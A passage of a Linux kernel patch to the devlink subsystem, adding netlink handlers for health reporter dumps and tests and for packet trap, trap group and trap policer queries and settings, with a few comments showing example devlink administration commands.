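++/* [Illustrative sketch, not part of this patch.] The dumpit above backs
++ * "devlink health dump show"; a typical invocation (device and reporter
++ * names are assumptions) looks like:
++ *
++ *   devlink health dump show pci/0000:00:05.0 reporter foo_queue
++ *
++ * The first dump iteration triggers devlink_health_do_dump() and caches the
++ * fmsg; later iterations verify the cached dump_ts, so a dump replaced
++ * mid-read fails with -EAGAIN ("Dump trampled, please retry").
++ */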
++
++static int
++devlink_nl_cmd_health_reporter_dump_clear_doit(struct sk_buff *skb,
++					       struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_health_reporter *reporter;
++
++	reporter = devlink_health_reporter_get_from_info(devlink, info);
++	if (!reporter)
++		return -EINVAL;
++
++	if (!reporter->ops->dump) {
++		devlink_health_reporter_put(reporter);
++		return -EOPNOTSUPP;
++	}
++
++	mutex_lock(&reporter->dump_lock);
++	devlink_health_dump_clear(reporter);
++	mutex_unlock(&reporter->dump_lock);
++	devlink_health_reporter_put(reporter);
++	return 0;
++}
++
++static int devlink_nl_cmd_health_reporter_test_doit(struct sk_buff *skb,
++						    struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_health_reporter *reporter;
++	int err;
++
++	reporter = devlink_health_reporter_get_from_info(devlink, info);
++	if (!reporter)
++		return -EINVAL;
++
++	if (!reporter->ops->test) {
++		devlink_health_reporter_put(reporter);
++		return -EOPNOTSUPP;
++	}
++
++	err = reporter->ops->test(reporter, info->extack);
++
++	devlink_health_reporter_put(reporter);
++	return err;
++}
++
++struct devlink_stats {
++	u64_stats_t rx_bytes;
++	u64_stats_t rx_packets;
++	struct u64_stats_sync syncp;
++};
++
++/**
++ * struct devlink_trap_policer_item - Packet trap policer attributes.
++ * @policer: Immutable packet trap policer attributes.
++ * @rate: Rate in packets / sec.
++ * @burst: Burst size in packets.
++ * @list: trap_policer_list member.
++ *
++ * Describes packet trap policer attributes. Created by devlink during trap
++ * policer registration.
++ */
++struct devlink_trap_policer_item {
++	const struct devlink_trap_policer *policer;
++	u64 rate;
++	u64 burst;
++	struct list_head list;
++};
++
++/**
++ * struct devlink_trap_group_item - Packet trap group attributes.
++ * @group: Immutable packet trap group attributes.
++ * @policer_item: Associated policer item. Can be NULL.
++ * @list: trap_group_list member.
++ * @stats: Trap group statistics.
++ *
++ * Describes packet trap group attributes. Created by devlink during trap
++ * group registration.
++ */
++struct devlink_trap_group_item {
++	const struct devlink_trap_group *group;
++	struct devlink_trap_policer_item *policer_item;
++	struct list_head list;
++	struct devlink_stats __percpu *stats;
++};
++
++/**
++ * struct devlink_trap_item - Packet trap attributes.
++ * @trap: Immutable packet trap attributes.
++ * @group_item: Associated group item.
++ * @list: trap_list member.
++ * @action: Trap action.
++ * @stats: Trap statistics.
++ * @priv: Driver private information.
++ *
++ * Describes both mutable and immutable packet trap attributes. Created by
++ * devlink during trap registration and used for all trap related operations.
++ */
++struct devlink_trap_item {
++	const struct devlink_trap *trap;
++	struct devlink_trap_group_item *group_item;
++	struct list_head list;
++	enum devlink_trap_action action;
++	struct devlink_stats __percpu *stats;
++	void *priv;
++};
++
++static struct devlink_trap_policer_item *
++devlink_trap_policer_item_lookup(struct devlink *devlink, u32 id)
++{
++	struct devlink_trap_policer_item *policer_item;
++
++	list_for_each_entry(policer_item, &devlink->trap_policer_list, list) {
++		if (policer_item->policer->id == id)
++			return policer_item;
++	}
++
++	return NULL;
++}
++
++static struct devlink_trap_item *
++devlink_trap_item_lookup(struct devlink *devlink, const char *name)
++{
++	struct devlink_trap_item *trap_item;
++
++	list_for_each_entry(trap_item, &devlink->trap_list, list) {
++		if (!strcmp(trap_item->trap->name, name))
++			return trap_item;
++	}
++
++	return NULL;
++}
++
++static struct devlink_trap_item *
++devlink_trap_item_get_from_info(struct devlink *devlink,
++				struct genl_info *info)
++{
++	struct nlattr *attr;
++
++	if (!info->attrs[DEVLINK_ATTR_TRAP_NAME])
++		return NULL;
++	attr = info->attrs[DEVLINK_ATTR_TRAP_NAME];
++
++	return devlink_trap_item_lookup(devlink, nla_data(attr));
++}
++
++static int
++devlink_trap_action_get_from_info(struct genl_info *info,
++				  enum devlink_trap_action *p_trap_action)
++{
++	u8 val;
++
++	val = nla_get_u8(info->attrs[DEVLINK_ATTR_TRAP_ACTION]);
++	switch (val) {
++	case DEVLINK_TRAP_ACTION_DROP:
++	case DEVLINK_TRAP_ACTION_TRAP:
++	case DEVLINK_TRAP_ACTION_MIRROR:
++		*p_trap_action = val;
++		break;
++	default:
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
++static int devlink_trap_metadata_put(struct sk_buff *msg,
++				     const struct devlink_trap *trap)
++{
++	struct nlattr *attr;
++
++	attr = nla_nest_start(msg, DEVLINK_ATTR_TRAP_METADATA);
++	if (!attr)
++		return -EMSGSIZE;
++
++	if ((trap->metadata_cap & DEVLINK_TRAP_METADATA_TYPE_F_IN_PORT) &&
++	    nla_put_flag(msg, DEVLINK_ATTR_TRAP_METADATA_TYPE_IN_PORT))
++		goto nla_put_failure;
++	if ((trap->metadata_cap & DEVLINK_TRAP_METADATA_TYPE_F_FA_COOKIE) &&
++	    nla_put_flag(msg, DEVLINK_ATTR_TRAP_METADATA_TYPE_FA_COOKIE))
++		goto nla_put_failure;
++
++	nla_nest_end(msg, attr);
++
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(msg, attr);
++	return -EMSGSIZE;
++}
++
++static void devlink_trap_stats_read(struct devlink_stats __percpu *trap_stats,
++				    struct devlink_stats *stats)
++{
++	int i;
++
++	memset(stats, 0, sizeof(*stats));
++	for_each_possible_cpu(i) {
++		struct devlink_stats *cpu_stats;
++		u64 rx_packets, rx_bytes;
++		unsigned int start;
++
++		cpu_stats = per_cpu_ptr(trap_stats, i);
++		do {
++			start = u64_stats_fetch_begin_irq(&cpu_stats->syncp);
++			rx_packets = u64_stats_read(&cpu_stats->rx_packets);
++			rx_bytes = u64_stats_read(&cpu_stats->rx_bytes);
++		} while (u64_stats_fetch_retry_irq(&cpu_stats->syncp, start));
++
++		u64_stats_add(&stats->rx_packets, rx_packets);
++		u64_stats_add(&stats->rx_bytes, rx_bytes);
++	}
++}
++
++static int
++devlink_trap_group_stats_put(struct sk_buff *msg,
++			     struct devlink_stats __percpu *trap_stats)
++{
++	struct devlink_stats stats;
++	struct nlattr *attr;
++
++	devlink_trap_stats_read(trap_stats, &stats);
++
++	attr = nla_nest_start(msg, DEVLINK_ATTR_STATS);
++	if (!attr)
++		return -EMSGSIZE;
++
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_PACKETS,
++			      u64_stats_read(&stats.rx_packets),
++			      DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_BYTES,
++			      u64_stats_read(&stats.rx_bytes),
++			      DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	nla_nest_end(msg, attr);
++
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(msg, attr);
++	return -EMSGSIZE;
++}
++
++static int devlink_trap_stats_put(struct sk_buff *msg, struct devlink *devlink,
++				  const struct devlink_trap_item *trap_item)
++{
++	struct devlink_stats stats;
++	struct nlattr *attr;
++	u64 drops = 0;
++	int err;
++
++	if (devlink->ops->trap_drop_counter_get) {
++		err = devlink->ops->trap_drop_counter_get(devlink,
++							  trap_item->trap,
++							  &drops);
++		if (err)
++			return err;
++	}
++
++	devlink_trap_stats_read(trap_item->stats, &stats);
++
++	attr = nla_nest_start(msg, DEVLINK_ATTR_STATS);
++	if (!attr)
++		return -EMSGSIZE;
++
++	if (devlink->ops->trap_drop_counter_get &&
++	    nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_DROPPED, drops,
++			      DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_PACKETS,
++			      u64_stats_read(&stats.rx_packets),
++			      DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_BYTES,
++			      u64_stats_read(&stats.rx_bytes),
++			      DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	nla_nest_end(msg, attr);
++
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(msg, attr);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_trap_fill(struct sk_buff *msg, struct devlink *devlink,
++				const struct devlink_trap_item *trap_item,
++				enum devlink_command cmd, u32 portid, u32 seq,
++				int flags)
++{
++	struct devlink_trap_group_item *group_item = trap_item->group_item;
++	void *hdr;
++	int err;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++
++	if (nla_put_string(msg, DEVLINK_ATTR_TRAP_GROUP_NAME,
++			   group_item->group->name))
++		goto nla_put_failure;
++
++	if (nla_put_string(msg, DEVLINK_ATTR_TRAP_NAME, trap_item->trap->name))
++		goto nla_put_failure;
++
++	if (nla_put_u8(msg, DEVLINK_ATTR_TRAP_TYPE, trap_item->trap->type))
++		goto nla_put_failure;
++
++	if (trap_item->trap->generic &&
++	    nla_put_flag(msg, DEVLINK_ATTR_TRAP_GENERIC))
++		goto nla_put_failure;
++
++	if (nla_put_u8(msg, DEVLINK_ATTR_TRAP_ACTION, trap_item->action))
++		goto nla_put_failure;
++
++	err = devlink_trap_metadata_put(msg, trap_item->trap);
++	if (err)
++		goto nla_put_failure;
++
++	err = devlink_trap_stats_put(msg, devlink, trap_item);
++	if (err)
++		goto nla_put_failure;
++
++	genlmsg_end(msg, hdr);
++
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_cmd_trap_get_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct netlink_ext_ack *extack = info->extack;
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_trap_item *trap_item;
++	struct sk_buff *msg;
++	int err;
++
++	if (list_empty(&devlink->trap_list))
++		return -EOPNOTSUPP;
++
++	trap_item = devlink_trap_item_get_from_info(devlink, info);
++	if (!trap_item) {
++		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap");
++		return -ENOENT;
++	}
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_trap_fill(msg, devlink, trap_item,
++				   DEVLINK_CMD_TRAP_NEW, info->snd_portid,
++				   info->snd_seq, 0);
++	if (err)
++		goto err_trap_fill;
++
++	return genlmsg_reply(msg, info);
++
++err_trap_fill:
++	nlmsg_free(msg);
++	return err;
++}
++
++static int devlink_nl_cmd_trap_get_dumpit(struct sk_buff *msg,
++					  struct netlink_callback *cb)
++{
++	struct devlink_trap_item *trap_item;
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		devl_lock(devlink);
++		list_for_each_entry(trap_item, &devlink->trap_list, list) {
++			if (idx < start) {
++				idx++;
++				continue;
++			}
++			err = devlink_nl_trap_fill(msg, devlink, trap_item,
++						   DEVLINK_CMD_TRAP_NEW,
++						   NETLINK_CB(cb->skb).portid,
++						   cb->nlh->nlmsg_seq,
++						   NLM_F_MULTI);
++			if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++			idx++;
++		}
++		devl_unlock(devlink);
++		devlink_put(devlink);
++	}
++out:
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int __devlink_trap_action_set(struct devlink *devlink,
++				     struct devlink_trap_item *trap_item,
++				     enum devlink_trap_action trap_action,
++				     struct netlink_ext_ack *extack)
++{
++	int err;
++
++	if (trap_item->action != trap_action &&
++	    trap_item->trap->type != DEVLINK_TRAP_TYPE_DROP) {
++		NL_SET_ERR_MSG_MOD(extack, "Cannot change action of non-drop traps. Skipping");
++		return 0;
++	}
++
++	err = devlink->ops->trap_action_set(devlink, trap_item->trap,
++					    trap_action, extack);
++	if (err)
++		return err;
++
++	trap_item->action = trap_action;
++
++	return 0;
++}
++
++static int devlink_trap_action_set(struct devlink *devlink,
++				   struct devlink_trap_item *trap_item,
++				   struct genl_info *info)
++{
++	enum devlink_trap_action trap_action;
++	int err;
++
++	if (!info->attrs[DEVLINK_ATTR_TRAP_ACTION])
++		return 0;
++
++	err = devlink_trap_action_get_from_info(info, &trap_action);
++	if (err) {
++		NL_SET_ERR_MSG_MOD(info->extack, "Invalid trap action");
++		return -EINVAL;
++	}
++
++	return __devlink_trap_action_set(devlink, trap_item, trap_action,
++					 info->extack);
++}
++
++static int devlink_nl_cmd_trap_set_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct netlink_ext_ack *extack = info->extack;
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_trap_item *trap_item;
++
++	if (list_empty(&devlink->trap_list))
++		return -EOPNOTSUPP;
++
++	trap_item = devlink_trap_item_get_from_info(devlink, info);
++	if (!trap_item) {
++		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap");
++		return -ENOENT;
++	}
++
++	return devlink_trap_action_set(devlink, trap_item, info);
++}
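++
++/* [Illustrative sketch, not part of this patch.] The doit above backs
++ * "devlink trap set"; a typical invocation (device and trap names are
++ * assumptions) looks like:
++ *
++ *   devlink trap set pci/0000:00:05.0 trap source_mac_is_multicast \
++ *           action drop
++ *
++ * Only traps of type DEVLINK_TRAP_TYPE_DROP may have their action changed;
++ * for other types the request is skipped with an extack message.
++ */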
++
++static struct devlink_trap_group_item *
++devlink_trap_group_item_lookup(struct devlink *devlink, const char *name)
++{
++	struct devlink_trap_group_item *group_item;
++
++	list_for_each_entry(group_item, &devlink->trap_group_list, list) {
++		if (!strcmp(group_item->group->name, name))
++			return group_item;
++	}
++
++	return NULL;
++}
++
++static struct devlink_trap_group_item *
++devlink_trap_group_item_lookup_by_id(struct devlink *devlink, u16 id)
++{
++	struct devlink_trap_group_item *group_item;
++
++	list_for_each_entry(group_item, &devlink->trap_group_list, list) {
++		if (group_item->group->id == id)
++			return group_item;
++	}
++
++	return NULL;
++}
++
++static struct devlink_trap_group_item *
++devlink_trap_group_item_get_from_info(struct devlink *devlink,
++				      struct genl_info *info)
++{
++	char *name;
++
++	if (!info->attrs[DEVLINK_ATTR_TRAP_GROUP_NAME])
++		return NULL;
++	name = nla_data(info->attrs[DEVLINK_ATTR_TRAP_GROUP_NAME]);
++
++	return devlink_trap_group_item_lookup(devlink, name);
++}
++
++static int
++devlink_nl_trap_group_fill(struct sk_buff *msg, struct devlink *devlink,
++			   const struct devlink_trap_group_item *group_item,
++			   enum devlink_command cmd, u32 portid, u32 seq,
++			   int flags)
++{
++	void *hdr;
++	int err;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++
++	if (nla_put_string(msg, DEVLINK_ATTR_TRAP_GROUP_NAME,
++			   group_item->group->name))
++		goto nla_put_failure;
++
++	if (group_item->group->generic &&
++	    nla_put_flag(msg, DEVLINK_ATTR_TRAP_GENERIC))
++		goto nla_put_failure;
++
++	if (group_item->policer_item &&
++	    nla_put_u32(msg, DEVLINK_ATTR_TRAP_POLICER_ID,
++			group_item->policer_item->policer->id))
++		goto nla_put_failure;
++
++	err = devlink_trap_group_stats_put(msg, group_item->stats);
++	if (err)
++		goto nla_put_failure;
++
++	genlmsg_end(msg, hdr);
++
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_cmd_trap_group_get_doit(struct sk_buff *skb,
++					      struct genl_info *info)
++{
++	struct netlink_ext_ack *extack = info->extack;
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_trap_group_item *group_item;
++	struct sk_buff *msg;
++	int err;
++
++	if (list_empty(&devlink->trap_group_list))
++		return -EOPNOTSUPP;
++
++	group_item = devlink_trap_group_item_get_from_info(devlink, info);
++	if (!group_item) {
++		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap group");
++		return -ENOENT;
++	}
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_trap_group_fill(msg, devlink, group_item,
++					 DEVLINK_CMD_TRAP_GROUP_NEW,
++					 info->snd_portid, info->snd_seq, 0);
++	if (err)
++		goto err_trap_group_fill;
++
++	return genlmsg_reply(msg, info);
++
++err_trap_group_fill:
++	nlmsg_free(msg);
++	return err;
++}
++
++static int devlink_nl_cmd_trap_group_get_dumpit(struct sk_buff *msg,
++						struct netlink_callback *cb)
++{
++	enum devlink_command cmd = DEVLINK_CMD_TRAP_GROUP_NEW;
++	struct devlink_trap_group_item *group_item;
++	u32 portid = NETLINK_CB(cb->skb).portid;
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		devl_lock(devlink);
++		list_for_each_entry(group_item, &devlink->trap_group_list,
++				    list) {
++			if (idx < start) {
++				idx++;
++				continue;
++			}
++			err = devlink_nl_trap_group_fill(msg, devlink,
++							 group_item, cmd,
++							 portid,
++							 cb->nlh->nlmsg_seq,
++							 NLM_F_MULTI);
++			if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++			idx++;
++		}
++		devl_unlock(devlink);
++		devlink_put(devlink);
++	}
++out:
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int
++__devlink_trap_group_action_set(struct devlink *devlink,
++				struct devlink_trap_group_item *group_item,
++				enum devlink_trap_action trap_action,
++				struct netlink_ext_ack *extack)
++{
++	const char *group_name = group_item->group->name;
++	struct devlink_trap_item *trap_item;
++	int err;
++
++	if (devlink->ops->trap_group_action_set) {
++		err = devlink->ops->trap_group_action_set(devlink, group_item->group,
++							  trap_action, extack);
++		if (err)
++			return err;
++
++		list_for_each_entry(trap_item, &devlink->trap_list, list) {
++			if (strcmp(trap_item->group_item->group->name, group_name))
++				continue;
++			if (trap_item->action != trap_action &&
++			    trap_item->trap->type != DEVLINK_TRAP_TYPE_DROP)
++				continue;
++			trap_item->action = trap_action;
++		}
++
++		return 0;
++	}
++
++	list_for_each_entry(trap_item, &devlink->trap_list, list) {
++		if (strcmp(trap_item->group_item->group->name, group_name))
++			continue;
++		err = __devlink_trap_action_set(devlink, trap_item,
++						trap_action, extack);
++		if (err)
++			return err;
++	}
++
++	return 0;
++}
++
++static int
++devlink_trap_group_action_set(struct devlink *devlink,
++			      struct devlink_trap_group_item *group_item,
++			      struct genl_info *info, bool *p_modified)
++{
++	enum devlink_trap_action trap_action;
++	int err;
++
++	if (!info->attrs[DEVLINK_ATTR_TRAP_ACTION])
++		return 0;
++
++	err = devlink_trap_action_get_from_info(info, &trap_action);
++	if (err) {
++		NL_SET_ERR_MSG_MOD(info->extack, "Invalid trap action");
++		return -EINVAL;
++	}
++
++	err = __devlink_trap_group_action_set(devlink, group_item, trap_action,
++					      info->extack);
++	if (err)
++		return err;
++
++	*p_modified = true;
++
++	return 0;
++}
++
++static int devlink_trap_group_set(struct devlink *devlink,
++				  struct devlink_trap_group_item *group_item,
++				  struct genl_info *info)
++{
++	struct devlink_trap_policer_item *policer_item;
++	struct netlink_ext_ack *extack = info->extack;
++	const struct devlink_trap_policer *policer;
++	struct nlattr **attrs = info->attrs;
++	int err;
++
++	if (!attrs[DEVLINK_ATTR_TRAP_POLICER_ID])
++		return 0;
++
++	if (!devlink->ops->trap_group_set)
++		return -EOPNOTSUPP;
++
++	policer_item = group_item->policer_item;
++	if (attrs[DEVLINK_ATTR_TRAP_POLICER_ID]) {
++		u32 policer_id;
++
++		policer_id = nla_get_u32(attrs[DEVLINK_ATTR_TRAP_POLICER_ID]);
++		policer_item = devlink_trap_policer_item_lookup(devlink,
++								policer_id);
++		if (policer_id && !policer_item) {
++			NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap policer");
++			return -ENOENT;
++		}
++	}
++	policer = policer_item ? policer_item->policer : NULL;
++
++	err = devlink->ops->trap_group_set(devlink, group_item->group, policer,
++					   extack);
++	if (err)
++		return err;
++
++	group_item->policer_item = policer_item;
++
++	return 0;
++}
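++
++/* Note on the lookup above: a DEVLINK_ATTR_TRAP_POLICER_ID of 0 is
++ * accepted and resolves to a NULL policer, which requests unbinding
++ * any policer from the group.
++ */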
++
++static int devlink_nl_cmd_trap_group_set_doit(struct sk_buff *skb,
++					      struct genl_info *info)
++{
++	struct netlink_ext_ack *extack = info->extack;
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_trap_group_item *group_item;
++	bool modified = false;
++	int err;
++
++	if (list_empty(&devlink->trap_group_list))
++		return -EOPNOTSUPP;
++
++	group_item = devlink_trap_group_item_get_from_info(devlink, info);
++	if (!group_item) {
++		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap group");
++		return -ENOENT;
++	}
++
++	err = devlink_trap_group_action_set(devlink, group_item, info,
++					    &modified);
++	if (err)
++		return err;
++
++	err = devlink_trap_group_set(devlink, group_item, info);
++	if (err)
++		goto err_trap_group_set;
++
++	return 0;
++
++err_trap_group_set:
++	if (modified)
++		NL_SET_ERR_MSG_MOD(extack, "Trap group set failed, but some changes were committed already");
++	return err;
++}
++
++static struct devlink_trap_policer_item *
++devlink_trap_policer_item_get_from_info(struct devlink *devlink,
++					struct genl_info *info)
++{
++	u32 id;
++
++	if (!info->attrs[DEVLINK_ATTR_TRAP_POLICER_ID])
++		return NULL;
++	id = nla_get_u32(info->attrs[DEVLINK_ATTR_TRAP_POLICER_ID]);
++
++	return devlink_trap_policer_item_lookup(devlink, id);
++}
++
++static int
++devlink_trap_policer_stats_put(struct sk_buff *msg, struct devlink *devlink,
++			       const struct devlink_trap_policer *policer)
++{
++	struct nlattr *attr;
++	u64 drops;
++	int err;
++
++	if (!devlink->ops->trap_policer_counter_get)
++		return 0;
++
++	err = devlink->ops->trap_policer_counter_get(devlink, policer, &drops);
++	if (err)
++		return err;
++
++	attr = nla_nest_start(msg, DEVLINK_ATTR_STATS);
++	if (!attr)
++		return -EMSGSIZE;
++
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_DROPPED, drops,
++			      DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	nla_nest_end(msg, attr);
++
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(msg, attr);
++	return -EMSGSIZE;
++}
++
++static int
++devlink_nl_trap_policer_fill(struct sk_buff *msg, struct devlink *devlink,
++			     const struct devlink_trap_policer_item *policer_item,
++			     enum devlink_command cmd, u32 portid, u32 seq,
++			     int flags)
++{
++	void *hdr;
++	int err;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++
++	if (nla_put_u32(msg, DEVLINK_ATTR_TRAP_POLICER_ID,
++			policer_item->policer->id))
++		goto nla_put_failure;
++
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_TRAP_POLICER_RATE,
++			      policer_item->rate, DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_TRAP_POLICER_BURST,
++			      policer_item->burst, DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	err = devlink_trap_policer_stats_put(msg, devlink,
++					     policer_item->policer);
++	if (err)
++		goto nla_put_failure;
++
++	genlmsg_end(msg, hdr);
++
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_cmd_trap_policer_get_doit(struct sk_buff *skb,
++						struct genl_info *info)
++{
++	struct devlink_trap_policer_item *policer_item;
++	struct netlink_ext_ack *extack = info->extack;
++	struct devlink *devlink = info->user_ptr[0];
++	struct sk_buff *msg;
++	int err;
++
++	if (list_empty(&devlink->trap_policer_list))
++		return -EOPNOTSUPP;
++
++	policer_item = devlink_trap_policer_item_get_from_info(devlink, info);
++	if (!policer_item) {
++		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap policer");
++		return -ENOENT;
++	}
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_trap_policer_fill(msg, devlink, policer_item,
++					   DEVLINK_CMD_TRAP_POLICER_NEW,
++					   info->snd_portid, info->snd_seq, 0);
++	if (err)
++		goto err_trap_policer_fill;
++
++	return genlmsg_reply(msg, info);
++
++err_trap_policer_fill:
++	nlmsg_free(msg);
++	return err;
++}
++
++static int devlink_nl_cmd_trap_policer_get_dumpit(struct sk_buff *msg,
++						  struct netlink_callback *cb)
++{
++	enum devlink_command cmd = DEVLINK_CMD_TRAP_POLICER_NEW;
++	struct devlink_trap_policer_item *policer_item;
++	u32 portid = NETLINK_CB(cb->skb).portid;
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		devl_lock(devlink);
++		list_for_each_entry(policer_item, &devlink->trap_policer_list,
++				    list) {
++			if (idx < start) {
++				idx++;
++				continue;
++			}
++			err = devlink_nl_trap_policer_fill(msg, devlink,
++							   policer_item, cmd,
++							   portid,
++							   cb->nlh->nlmsg_seq,
++							   NLM_F_MULTI);
++			if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++			idx++;
++		}
++		devl_unlock(devlink);
++		devlink_put(devlink);
++	}
++out:
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int
++devlink_trap_policer_set(struct devlink *devlink,
++			 struct devlink_trap_policer_item *policer_item,
++			 struct genl_info *info)
++{
++	struct netlink_ext_ack *extack = info->extack;
++	struct nlattr **attrs = info->attrs;
++	u64 rate, burst;
++	int err;
++
++	rate = policer_item->rate;
++	burst = policer_item->burst;
++
++	if (attrs[DEVLINK_ATTR_TRAP_POLICER_RATE])
++		rate = nla_get_u64(attrs[DEVLINK_ATTR_TRAP_POLICER_RATE]);
++
++	if (attrs[DEVLINK_ATTR_TRAP_POLICER_BURST])
++		burst = nla_get_u64(attrs[DEVLINK_ATTR_TRAP_POLICER_BURST]);
++
++	if (rate < policer_item->policer->min_rate) {
++		NL_SET_ERR_MSG_MOD(extack, "Policer rate lower than limit");
++		return -EINVAL;
++	}
++
++	if (rate > policer_item->policer->max_rate) {
++		NL_SET_ERR_MSG_MOD(extack, "Policer rate higher than limit");
++		return -EINVAL;
++	}
++
++	if (burst < policer_item->policer->min_burst) {
++		NL_SET_ERR_MSG_MOD(extack, "Policer burst size lower than limit");
++		return -EINVAL;
++	}
++
++	if (burst > policer_item->policer->max_burst) {
++		NL_SET_ERR_MSG_MOD(extack, "Policer burst size higher than limit");
++		return -EINVAL;
++	}
++
++	err = devlink->ops->trap_policer_set(devlink, policer_item->policer,
++					     rate, burst, info->extack);
++	if (err)
++		return err;
++
++	policer_item->rate = rate;
++	policer_item->burst = burst;
++
++	return 0;
++}
++
++static int devlink_nl_cmd_trap_policer_set_doit(struct sk_buff *skb,
++						struct genl_info *info)
++{
++	struct devlink_trap_policer_item *policer_item;
++	struct netlink_ext_ack *extack = info->extack;
++	struct devlink *devlink = info->user_ptr[0];
++
++	if (list_empty(&devlink->trap_policer_list))
++		return -EOPNOTSUPP;
++
++	if (!devlink->ops->trap_policer_set)
++		return -EOPNOTSUPP;
++
++	policer_item = devlink_trap_policer_item_get_from_info(devlink, info);
++	if (!policer_item) {
++		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap policer");
++		return -ENOENT;
++	}
++
++	return devlink_trap_policer_set(devlink, policer_item, info);
++}
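++
++/* For illustration, iproute2's devlink tool reaches this handler with
++ * a command along the lines of (all values are placeholders):
++ *
++ *	devlink trap policer set pci/0000:01:00.0 policer 1 \
++ *		rate 1000 burst 128
++ */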
++
++static const struct nla_policy devlink_nl_policy[DEVLINK_ATTR_MAX + 1] = {
++	[DEVLINK_ATTR_UNSPEC] = { .strict_start_type =
++		DEVLINK_ATTR_TRAP_POLICER_ID },
++	[DEVLINK_ATTR_BUS_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_DEV_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_PORT_INDEX] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_PORT_TYPE] = NLA_POLICY_RANGE(NLA_U16, DEVLINK_PORT_TYPE_AUTO,
++						    DEVLINK_PORT_TYPE_IB),
++	[DEVLINK_ATTR_PORT_SPLIT_COUNT] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_SB_INDEX] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_SB_POOL_INDEX] = { .type = NLA_U16 },
++	[DEVLINK_ATTR_SB_POOL_TYPE] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_SB_POOL_SIZE] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_SB_POOL_THRESHOLD_TYPE] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_SB_THRESHOLD] = { .type = NLA_U32 },
